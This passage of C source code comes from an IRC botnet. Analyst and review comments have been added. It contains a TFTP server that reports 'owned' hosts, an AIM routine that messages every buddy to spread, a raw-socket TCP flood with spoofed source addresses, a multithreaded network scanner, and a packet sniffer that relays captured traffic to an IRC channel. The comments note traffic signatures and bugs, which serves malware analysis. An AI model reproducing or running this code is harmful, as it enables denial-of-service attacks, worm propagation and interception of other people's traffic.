	// is sent to IRC even when tftp.silent is set.
	if ((fp=fopen(tftp.filename, "rb")) == NULL) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
		irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);
	}

	// Serve until a receive or file read returns <= 0, or until gotinfo in
	// the launcher's struct is cleared. NOTE(review): tftps still points at
	// the launcher's TFTP; its lifetime is not visible from here.
	while(err>0 && tftps->gotinfo && fp) { 
		TIMEVAL timeout; 
		timeout.tv_sec=5; 
		timeout.tv_usec=5000; 

		fd_set fd; 
		FD_ZERO(&fd); 
		FD_SET(ssock,&fd); 

		memset(buffer,0,sizeof(buffer)); 
		if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { 
			SOCKADDR_IN csin;
			int csin_len=sizeof(csin); 
			char f_buffer[BLOCKSIZE+4]=""; 
			
			// The request is read into a 128-byte buffer.
			err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); 
			// NOTE(review): the result of finet_ntoa is used as the format
			// string; "%s" with the address as argument would be the safe form.
			sprintf(IP,finet_ntoa(csin.sin_addr));
        
			// parse buffer
			if(buffer[0]==0 && buffer[1]==1) { //RRQ
				// Layout expected: 2-byte opcode, file name, NUL, mode string.
				// NOTE(review): tmptype is offset by strlen(tftp.requestname)+3
				// without checking that this stays inside the 128-byte buffer.
				char *tmprequest=buffer,*tmptype=buffer;
				tmprequest+=2; //skip the opcode
				tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
				if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { 
					fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
					// for loop to add a \0 to the end of the requestname
					// NOTE(review): the log line is formatted into the 128-byte
					// receive buffer with an unbounded sprintf.
					sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
					addlog(buffer);
				} else { // good rrq packet send first data packet 
					fseek(fp, 0, SEEK_SET); 
					f_buffer[0]=0; f_buffer[1]=3; // DATA
					f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
					err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
					fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);

					// NOTE(review): the sprintf below is commented out, so
					// sendbuf is sent and logged with whatever it already
					// holds; it is uninitialised on the first request.
					//sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				} 
			} else if(buffer[0]==0 && buffer[1]==4) { // ACK 
				// send next packet 
				// The next block number is the acknowledged number plus one,
				// with manual carry from the low byte into the high byte.
				unsigned int blocks; 
				BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #

				f_buffer[0]=0; f_buffer[1]=3;	// DATA
				if (b2==255) {					// DATA BLOCK #
					f_buffer[2]=++b1;
					f_buffer[3]=b2=0;
				} else {
					f_buffer[2]=b1;
					f_buffer[3]=++b2;
				}

				// File offset is derived entirely from the client's ACK value.
				blocks=(b1 * 256) + b2 - 1; 
				// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
				fseek(fp, blocks * BLOCKSIZE, SEEK_SET); 
				err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
				fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
				// A zero-byte read means the client acknowledged the last
				// block; the completion line is reported and the loop ends.
				if (err==0) {
					sprintf(sendbuf,"[TFTP]: I just owned: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				}
			} else { // we dont support any other commands 
				fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); 
			} 
		} else 
			continue;
	} 
	// check for ack, then msg irc on transfer complete

	fclosesocket(ssock); 
	fclose(fp); 

	tftp.threads--; 
	// Exit only when the launcher's flag was cleared; otherwise wait a second
	// and restart the server by calling this function again with the same
	// param (one more stack frame per served transfer).
	if(tftps->gotinfo == FALSE) {
		clearthread(tftp.threadnum);

		ExitThread(0); 
	}
	Sleep(1000);
   
	return tftpserver(param); 
} 
Exemple #16
//void TritonMessage(char* szMsg, unsigned int iDelay)
DWORD WINAPI TritonMessage(LPVOID param)
{
	// Thread entry that drives a locally running AIM client through its GUI.
	// It locates the client's tray window and buddy list, closes the client's
	// other top-level windows, then repeatedly opens the next buddy with
	// simulated key presses and passes the message in tim.data1 to TritonIm
	// for each conversation window that opens.
	// Analyst notes: the window class/title pairs used for discovery are
	// "imAppSystemTrayHandler"/"imApp" and "__oxFrame.class__"/"AIM"; IM
	// windows are recognised by the titles " IMs" or "IM with ...".
	// TritonSetupList, TritonIm, FocusWindow and SysKey are defined elsewhere.
	NTHREAD tim = *((NTHREAD *)param);
	NTHREAD *tims = (NTHREAD *)param;
	tims->gotinfo = TRUE;
	IRC* irc=(IRC*)tim.conn;

	// NOTE(review): strncpy does not terminate szMsg when tim.data1 holds
	// sizeof(szMsg) or more characters.
	char szMsg[512];
	strncpy(szMsg,tim.data1,sizeof(szMsg));
	bool bDone = false;
	char szWindowText[256], szLastBuddy[256];
	ZeroMemory(&szLastBuddy, 256);
	HWND hTray = FindWindow("imAppSystemTrayHandler", "imApp"), hBuddyList = NULL, hKill = NULL;
	// Nothing happens unless the client's tray window exists.
	if(IsWindow(hTray))
	{
		// Undocumented message to the tray handler; presumably it opens the
		// buddy list (the constants are not explained in the source).
		SendMessage(hTray, 0x0065, 0x00000141, 0x00000203);
		// NOTE(review): busy loop with no sleep and no timeout; it spins until
		// a buddy-list window appears.
		do {
			hBuddyList = FindWindow("__oxFrame.class__", "AIM");
		} while(!IsWindow(hBuddyList));
		// Close every client frame window whose title is not "AIM".
		do {
			hKill = FindWindowEx(NULL, hKill, "__oxFrame.class__", NULL);
			ZeroMemory(&szWindowText, 256);
			GetWindowText(hKill, szWindowText, 256);
			if(strcmp(szWindowText, "AIM") != 0)
				SendMessage(hKill, WM_CLOSE, 0, 0);
		} while(IsWindow(hKill));
		TritonSetupList(hBuddyList, false);
		// One buddy per pass: move the selection down, press Return, handle
		// the IM window that opens. The loop stops when the same window title
		// is seen twice in a row, which is taken as the end of the list.
		while(!bDone)
		{
			Sleep(3000);
			FocusWindow(hBuddyList);
 			SysKey(hBuddyList, VK_DOWN, 1);
 			SysKey(hBuddyList, VK_RETURN, 1);
			HWND hWindow = NULL;
			do {
				hWindow = FindWindowEx(NULL, hWindow, "__oxFrame.class__", NULL);
				if(IsWindow(hWindow))
				{
					ZeroMemory(&szWindowText, 256);
					GetWindowText(hWindow, szWindowText, 256);
					if((strcmp(szWindowText, " IMs") == 0) ||
						(strstr(szWindowText, "IM with ") != NULL))
					{
						if(strcmp(szLastBuddy, szWindowText) == 0)
							bDone = true;
						else {
							strncpy(szLastBuddy, szWindowText, 256);
							FocusWindow(hWindow);
							TritonIm(hWindow, szMsg);
						}
						// The conversation window is closed in either case.
						SendMessage(hWindow, WM_CLOSE, 0, 0);
					}
				}
			} while(IsWindow(hWindow));
		}
 		TritonSetupList(hBuddyList, true);
	}
	// irc is assigned above but not used in this function; no result is
	// reported back.
	clearthread(tim.threadnum);
	ExitThread(0);

	return 0;
}
Exemple #17
DWORD WINAPI TcpFloodThread(LPVOID param) 
{
	// Thread entry that sends hand-built TCP packets to tcpflood.ip through a
	// raw socket for tcpflood.time seconds, then reports the packet count.
	// Analyst notes -- values that are constant in every packet built below
	// and can therefore serve as a traffic signature:
	//   - TCP sequence number 0x12345678, window 512, urgent pointer 0;
	//   - IP TTL 128, ident field set to 1, no fragmentation flags;
	//   - source port drawn from 0..1024 (rand()%1025);
	//   - a 60-byte datagram: IP header, TCP header without options, zero pad.
	// Flags are SYN or ACK according to tcpflood.type; the source address is
	// random when tcpflood.spoof is set. Opening a raw socket and setting
	// IP_HDRINCL are themselves host-side observables. Status lines carry the
	// fixed prefix "[TCP]:".
	TCPFLOOD tcpflood = *((TCPFLOOD *)param);
	TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
	tcpfloods->gotinfo = TRUE;

	char sendbuf[IRCLINE], szSendBuf[60]={0};

	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 

	srand(GetTickCount());

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}
	
	// IP_HDRINCL: the caller supplies the IP header itself.
	// NOTE(review): ssock is not closed on this or the next failure path.
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	} 

	// Only a dotted-quad address is accepted; no name resolution is done.
	if (finet_addr(tcpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[TCP]: Invalid target IP.");
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	// One packet per iteration until the configured number of seconds passes.
	while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
		// IP header: version 4, header length in 32-bit words.
		ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
		ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); 
		ipHeader.ident=1; 
		ipHeader.frag_and_flags=0; 
		ipHeader.ttl=128; 
		ipHeader.proto=IPPROTO_TCP; 
		ipHeader.checksum=0; 
		// Source address: random when spoofing, otherwise the address that
		// GetIP (defined elsewhere) returns for the IRC socket.
		ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
		ipHeader.destIP=ssin.sin_addr.s_addr;
		
		// Destination port: fixed when tcpflood.port is set, else 0..1024.
		((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons((unsigned short)tcpflood.port))); 
		tcpHeader.sport=fhtons((unsigned short)(rand()%1025));  
		tcpHeader.seq=fhtonl(0x12345678); 
		// NOTE(review): if type contains none of "syn", "ack" or "random",
		// ack_seq and flags are never assigned and carry indeterminate values.
		if (strstr(tcpflood.type,"syn")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=SYN;
		} else if (strstr(tcpflood.type,"ack")) {
			tcpHeader.ack_seq=0;
			tcpHeader.flags=ACK;
		} else if (strstr(tcpflood.type,"random")) {
			tcpHeader.ack_seq=rand()%3;
			((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
		}
		tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0); 
		tcpHeader.window=fhtons(512); 
		tcpHeader.urg_ptr=0; 
		tcpHeader.checksum=0;
		
		// Pseudo-header used only as input to the TCP checksum.
		psdHeader.saddr=ipHeader.sourceIP; 
		psdHeader.daddr=ipHeader.destIP; 
		psdHeader.zero=0; 
		psdHeader.proto=IPPROTO_TCP; 
		psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader))); 

		// szSendBuf is used twice: first as scratch space for the TCP checksum
		// (pseudo-header + TCP header), then for the datagram that is sent
		// (IP header + TCP header + 4 zero bytes).
		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
		tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
		memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader)); 
		memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4); 
		ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader)); 
		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 

		// The whole 60-byte buffer is sent regardless of the header sizes.
		if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { 
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
			if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
			addlog(sendbuf);

			clearthread(tcpflood.threadnum);

			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	// Summary line: packet count, average rate and total volume.
	sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice); 
	addlog(sendbuf);

	clearthread(tcpflood.threadnum);

	ExitThread(0); 
}
Exemple #18
DWORD WINAPI AdvScanner(LPVOID param)
{
	// Coordinator thread for one scan job. It records the start address in
	// advinfo[], starts scan.threads worker threads running AdvPortScanner,
	// waits either scan.minutes minutes or until advinfo[].info is cleared,
	// then reports completion and releases its thread slot.
	// CheckServers, AdvPortScanner, advinfo and CriticalSection are defined
	// elsewhere. Log and IRC lines carry the fixed prefix "scan --".
	char buffer[LOGLINE];
	//char szSelfExe[MAX_PATH];

	// Copy the launcher's ADVSCAN by value and flag that the copy was taken.
	ADVSCAN scan = *((ADVSCAN *)param);
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);

	CheckServers(scan);

	// When findthreadid(SCAN_THREAD) returns 1 (presumably: this is the only
	// scan thread), the shared critical section is reset.
	// NOTE(review): DeleteCriticalSection is called whether or not the
	// section was ever initialised.
	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			// failed to initialize CriticalSection
			// NOTE(review): this path returns without clearthread(), unlike
			// the normal exit at the end of the function.
			sprintf(buffer,"scan -- Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	advinfo[scan.threadnum].info = TRUE;
	// Start the workers. Each one receives a pointer to this thread's local
	// scan struct, with cthreadid / cthreadnum set for that worker just
	// before the thread is created.
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"scan -- %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		// NOTE(review): cgotinfo is polled as the worker's "copied" signal but
		// is not reset to FALSE inside this loop; unless the worker resets it,
		// the wait returns at once for every worker after the first.
		if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
			while (scan.cgotinfo == FALSE)
				Sleep(30);
		} else {
			sprintf(buffer, "scan -- Failed to start worker thread, error: <%d>.", GetLastError());
			addlog(buffer);
		}

		Sleep(30);
	}

	// Timed scan: sleep for the configured number of minutes. Untimed scan:
	// poll until something else clears advinfo[].info.
	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	// advinfo[].ip is read back here; presumably the workers advance it, so
	// the report shows the last address reached.
	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"scan -- Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	// Clearing info is presumably the stop signal for the workers; the sleep
	// gives them time to notice it before the critical section is deleted.
	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);

	if (findthreadid(SCAN_THREAD) == 1)
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);
}
Exemple #19
DWORD WINAPI SnifferThread(LPVOID param) { 
   // Thread entry for a passive packet capture on the local host. It binds a
   // raw IP socket to the first address of the local host name, enables
   // SIO_RCVALL so the socket receives all IP traffic seen by that interface,
   // and passes each TCP payload to the IsSuspicious* matchers (defined
   // elsewhere). A match is relayed to the IRC channel together with the
   // source and destination address and port.
   // Analyst notes: traffic on ports 110 and 25 is skipped entirely, and port
   // 80 is excluded from the Bot/IRC/FTP matchers. The relayed lines contain
   // the fixed tag "SNIFFER" wrapped in IRC colour codes followed by one of
   // "Bot sniff", "IRC sniff", "FTP sniff", "HTTP sniff" or "VULN sniff". A
   // process that opens a raw socket and issues SIO_RCVALL is itself a
   // host-side indicator.
   SNIFFER sniff = *((SNIFFER *)param); 
   SNIFFER *sniffs = (SNIFFER *)param; 
   sniffs->gotinfo = TRUE; 

   char sendbuf[IRCLINE]; 
   int sock; sockaddr_in addr_in; hostent *hEnt; 
   IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; 
   char szName[255]={0}; unsigned long lLocalIp; 
   addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; 
   // NOTE(review): hEnt is dereferenced without a NULL check, and h_length
   // bytes are copied into an unsigned long.
   fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); 
   memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); 
   addr_in.sin_addr.s_addr=lLocalIp; 

   sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); 

   // NOTE(review): this path returns without clearthread() and reports nothing.
   if(sock==INVALID_SOCKET) return NULL; 
   if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   // SIO_RCVALL with a non-zero option value switches the socket to receiving
   // all packets on the bound interface.
   int optval=1; DWORD dwBytesRet; 
   if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) 
   { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   // 64 KB receive buffer on the stack; ipHeader aliases its start.
   char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; 

   // Capture loop. There is no exit condition: a failed receive is not
   // detected (iRead is never checked) and the cleanup after the loop is
   // unreachable.
   while(1) 
   { 
      // Clear the buffer 
      memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; 

      // Read the raw packet 
      iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); 

      // Process if its a TCP/IP packet 
      if(ipHeader->proto==6) 
      {   tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); 
         // NOTE(review): the TCP header is located at a fixed offset of
         // sizeof(*ipHeader); a packet whose IP header carries options would
         // presumably be parsed at the wrong offset.
         int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; 
         iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); 
          
         if(iSrcPort !=110 && iSrcPort!=25 && 
            iDestPort !=110 && iDestPort!=25) 
         { 
         sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); 
         sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); 

         // The payload is treated as a C string starting after fixed-size IP
         // and TCP headers. Termination relies on the memset above, so a
         // payload that fills the buffer to its last byte has no terminator.
         // CR and LF are replaced by spaces so the text fits one IRC line.
         szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); 
         for(int i=0; i<(int)strlen(szPacket); i++) { 
            if(szPacket[i]=='\r') szPacket[i]='\x20'; 
            if(szPacket[i]=='\n') szPacket[i]='\x20'; } 

         // Matchers are tried in a fixed order and only the first match is
         // reported. _snprintf bounds the line to sendbuf, but it does not
         // write a terminator when the output is truncated.
         if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 


         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(IsSuspiciousHTTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
         else if(IsSuspiciousVULN(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
      } 
   } 
   } 
   // Unreachable: the loop above never breaks.
   fclosesocket(sock); 
   clearthread(sniff.threadnum); 
   ExitThread(0); 
   return 0; 
}